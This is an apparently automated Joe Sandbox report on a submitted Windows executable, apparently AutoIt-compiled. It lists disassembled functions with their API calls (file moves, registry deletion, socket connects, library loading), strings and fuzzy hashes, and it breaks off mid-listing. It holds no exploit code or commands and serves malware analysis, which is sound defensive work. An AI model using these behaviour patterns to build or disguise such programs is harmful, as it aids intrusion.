Function 00A755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A7560A
_wcsncpy.LIBCMT ref: 00A7563F
_wcsncpy.LIBCMT ref: 00A75671
_wcsncpy.LIBCMT ref: 00A756A4
_wcsncpy.LIBCMT ref: 00A756E6
_wcsncpy.LIBCMT ref: 00A75720
_wcsncpy.LIBCMT ref: 00A7574F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: a99a0b09e4e7ececf6ecf30f41d54f7bc8fa1aa05653f32d771935f8bb3d3d15
Instruction ID: a8c5dd6f84cbccd571a3d647a893712167c276031a61fef01ba78b99478625e0
Opcode Fuzzy Hash: a99a0b09e4e7ececf6ecf30f41d54f7bc8fa1aa05653f32d771935f8bb3d3d15
Instruction Fuzzy Hash: FD419076D10614B6CB15EBB48C86ACFB3B8AF05310F50C966F518E3221FB74E255C7AA

Function 00A73671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B

Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4

lstrcmpiW.KERNEL32(?,?), ref: 00A736B7
_wcscmp.LIBCMT ref: 00A736D3
MoveFileW.KERNEL32(?,?), ref: 00A736EB
_wcscat.LIBCMT ref: 00A73733
SHFileOperationW.SHELL32(?), ref: 00A7379F

Strings

\*.*, xrefs: 00A7372D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ab53737d6d1ed99ca62e87501993c490c5eb1c846270ed9949673e0ec880c6da
Instruction ID: e6712cc7dae174ab9c33a21a23aaea4698cee3b680be74f445b56a57a32e450b
Opcode Fuzzy Hash: ab53737d6d1ed99ca62e87501993c490c5eb1c846270ed9949673e0ec880c6da
Instruction Fuzzy Hash: 20418172508345AECB55EF64C941ADFB7ECAF88380F40892EF499C3251EB34D689C756

Function 00A97291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A972AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97351
IsMenu.USER32(?), ref: 00A97369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A973B1
DrawMenuBar.USER32 ref: 00A973C4

Strings

0, xrefs: 00A9729E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 30b2ec74c254fd9cdd1cb5305f4a1e31f23967dce8aa9792ead3aa443ea2e178
Instruction ID: 439a14ed9aa8daabbeb9887579b7a2c8cbe9a1ae00355bb716f75f36e8538ca8
Opcode Fuzzy Hash: 30b2ec74c254fd9cdd1cb5305f4a1e31f23967dce8aa9792ead3aa443ea2e178
Instruction Fuzzy Hash: 6A411575A14208EFDF20DFA0D884A9EBBF8FB09350F14852AFD15AB250D730AD50EB60

Function 00A90FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A90FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A90FFE
FreeLibrary.KERNEL32(00000000), ref: 00A910B5

Part of subcall function 00A90FA5: RegCloseKey.ADVAPI32(?), ref: 00A9101B
Part of subcall function 00A90FA5: FreeLibrary.KERNEL32(?), ref: 00A9106D
Part of subcall function 00A90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A91090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A91058

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
Instruction ID: bb13edd31b8fa35955f0baeab67a0a37ceef950da99dd8c73ca7672e9c0c435e
Opcode Fuzzy Hash: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
Instruction Fuzzy Hash: 2A31EBB1A01109BFDF15DF94DC89EFFB7BCEF08350F10016AE512E2151EA759E859AA0

Function 00A962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A962EC
GetWindowLongW.USER32(01114B18,000000F0), ref: 00A9631F
GetWindowLongW.USER32(01114B18,000000F0), ref: 00A96354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A96386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A963B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A963C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A963DB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
Instruction ID: 2c862e428284e2a21f767c84a8ec797db0bba8bd7a3dbf2735b65bee763bc8a6
Opcode Fuzzy Hash: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
Instruction Fuzzy Hash: 1C31F034744250AFDF21CFA9DC85F5A37E1BB5A714F1901A6F601CF2B2CB71A841AB50

Function 00A6DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB54
SysAllocString.OLEAUT32(00000000), ref: 00A6DB57
SysAllocString.OLEAUT32(?), ref: 00A6DB75
SysFreeString.OLEAUT32(?), ref: 00A6DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DBA3
SysAllocString.OLEAUT32(?), ref: 00A6DBB1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: fc86d6fe68c15d8849106352755ab0f9e938908a3a6fc9b719a622eefbd2ba5b
Instruction ID: e390c8cdb201934f1cb8bcafa666122d41713b14af5b5f5e4b69d639abdcaecf
Opcode Fuzzy Hash: fc86d6fe68c15d8849106352755ab0f9e938908a3a6fc9b719a622eefbd2ba5b
Instruction Fuzzy Hash: F4216276B00219AFDF10EFA8DC88CBB77BCEB093A0B158566F954DB254DA709C4187A4

Function 00A86173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A861C6
WSAGetLastError.WSOCK32(00000000), ref: 00A861D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A8620E
connect.WSOCK32(00000000,?,00000010), ref: 00A86217
WSAGetLastError.WSOCK32 ref: 00A86221
closesocket.WSOCK32(00000000), ref: 00A8624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A86263

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
Instruction ID: 4a350043690b1bfe70a0f5b4983c5d1519d6c9192b7ef891e2563b11e9bdc51d
Opcode Fuzzy Hash: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
Instruction Fuzzy Hash: 6D319C31600108AFEF10AF64CC89BFE7BACEB45761F048069F905E7292DB70AD45CBA1

Function 00A6F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A6F671
__wcsnicmp.LIBCMT ref: 00A6F692
__wcsnicmp.LIBCMT ref: 00A6F6AC

Strings

#OnAutoItStartRegister, xrefs: 00A6F6A6
#notrayicon, xrefs: 00A6F669
#requireadmin, xrefs: 00A6F68C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: f97ee212fa4aede17502b1df6e35b15c6915b44f4dbd39b25937c9233f4bdcc9
Instruction ID: 6f49049879a0ebf2997884ff31565b384f4abf1fdcef363372e469aa52bdac88
Opcode Fuzzy Hash: f97ee212fa4aede17502b1df6e35b15c6915b44f4dbd39b25937c9233f4bdcc9
Instruction Fuzzy Hash: E82146B22042517ED620EB34FD03FA773B8EF56340F14443AF85687091EB519D82C3A5

Function 00A6DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC2F
SysAllocString.OLEAUT32(00000000), ref: 00A6DC32
SysAllocString.OLEAUT32 ref: 00A6DC53
SysFreeString.OLEAUT32 ref: 00A6DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DC76
SysAllocString.OLEAUT32(?), ref: 00A6DC84

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 860c2f49c6833ea50e4976287d4c0b7a687d820a3fea8dce898b2856c5a3de88
Instruction ID: 5b3cea7979b8731caa558cab5f1c283ec85dd6fededd794a74a44f1f3344bd2c
Opcode Fuzzy Hash: 860c2f49c6833ea50e4976287d4c0b7a687d820a3fea8dce898b2856c5a3de88
Instruction Fuzzy Hash: CB213135704208AFDB10DFF8DC88DAA77BCEB493A0B108126F914DB261DA709C41C764

Function 00A975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A97632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A9763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A9764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A97659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A97665

Strings

Msctls_Progress32, xrefs: 00A97603

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
Instruction ID: ec1ad7d465c7998b79f70206eaf77381039c2d603d650efa5fe7dcce62f26020
Opcode Fuzzy Hash: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
Instruction Fuzzy Hash: 7D11B6B1210219BFEF118F64CC85EEB7F6DEF08798F114115B704A6050CB729C21DBA4

Function 00A39AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00A39AE6

Part of subcall function 00A33187: EncodePointer.KERNEL32(00000000), ref: 00A3318A
Part of subcall function 00A33187: __initp_misc_winsig.LIBCMT ref: 00A331A5
Part of subcall function 00A33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A39EA0
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A39EB4
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A39EC7
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A39EDA
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A39EED
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A39F00
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A39F13
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A39F26
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A39F39
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A39F4C
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A39F5F
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A39F72
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A39F85
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A39F98
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A39FAB
Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A39FBE

__mtinitlocks.LIBCMT ref: 00A39AEB
__mtterm.LIBCMT ref: 00A39AF4

Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C56
Part of subcall function 00A39B5C: _free.LIBCMT ref: 00A39C5D
Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00ACEC00,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C7F

__calloc_crt.LIBCMT ref: 00A39B19
__initptd.LIBCMT ref: 00A39B3B
GetCurrentThreadId.KERNEL32 ref: 00A39B42

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
Instruction ID: 83e4012287b3500060473333726f23aeb5581a942c08cca2397b31add1b9ad0b
Opcode Fuzzy Hash: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
Instruction Fuzzy Hash: 80F0B432A0D7116AFA34BBB4BD03A4BB694DF027B0F200B1AF460C50D2FFE0844241A0

Function 00A3406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A33F85), ref: 00A34085
GetProcAddress.KERNEL32(00000000), ref: 00A3408C
EncodePointer.KERNEL32(00000000), ref: 00A34097
DecodePointer.KERNEL32(00A33F85), ref: 00A340B2

Strings

RoUninitialize, xrefs: 00A34074
combase.dll, xrefs: 00A34080

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
Instruction ID: 6dc8378af0b84bddd0d362c7f0a77f0e8e983708b9a4d828434a0b060790b637
Opcode Fuzzy Hash: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
Instruction Fuzzy Hash: FFE09A75642302AFEE10DFE5EC09B453BA4BB05742F104526F512F50A0CFBA96028B15

Function 00A764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A7660B
_memmove.LIBCMT ref: 00A76546

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

_memmove.LIBCMT ref: 00A765B9
_memmove.LIBCMT ref: 00A766A0
_memmove.LIBCMT ref: 00A766B9
_memmove.LIBCMT ref: 00A766D5

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: e2f077073b5909c01374231f0bb015116d96ad9d09f9824cc9c9ebd728a033fe
Instruction ID: 693241ffe4a85ccc6fc8a54a27bb57bcd9e4b2e61294b3c080cdd26a118775f1
Opcode Fuzzy Hash: e2f077073b5909c01374231f0bb015116d96ad9d09f9824cc9c9ebd728a033fe
Instruction Fuzzy Hash: 78618B30A0065A9BCF05EF60CE92FFE37A9AF05308F448529F8596B192DB35E946DB50

Function 00A901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31

